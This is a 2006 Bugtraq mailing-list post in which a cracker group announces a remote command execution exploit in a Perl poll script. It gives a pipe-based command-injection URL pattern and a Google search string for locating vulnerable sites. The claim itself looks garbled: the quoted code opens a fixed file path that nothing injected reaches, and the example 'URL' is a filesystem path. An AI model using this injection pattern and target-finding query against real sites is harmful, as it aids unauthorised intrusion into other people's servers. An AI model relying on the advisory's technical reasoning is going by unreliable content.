
Date: 26 Apr 2006 02:07:49 -0000
From: CrAzY.CrAcKeR@...mail.com
To: bugtraq@...urityfocus.com
Subject: poll.pl<--remote commands execution exploit


Subject:poll.pl<--remote commands execution 

>>>>>>>>-----------------<<<<<<<<

foud by:CrAzY CrAcKeR
::::...alshmokh team...::::
Site: http://www.alshmokh.com

>>>>>>>>-----------------<<<<<<<<

Bug is found in this script:
open (HAND,"/web/htdocs/ronpoll/question") || die "Error opening file polldata $!|n"; 
while (<HAND>) {
  print;
 }
>>>>>>>>-----------------<<<<<<<<

----example:

http://web/htdocs/ronpoll/question|command|

----Search:

allinurl:"poll.pl"

>>>>>>>>-----------------<<<<<<<<
E-mail: CrAzY.CrAcKeR@...mail.com
presentation for each separation alshmokh


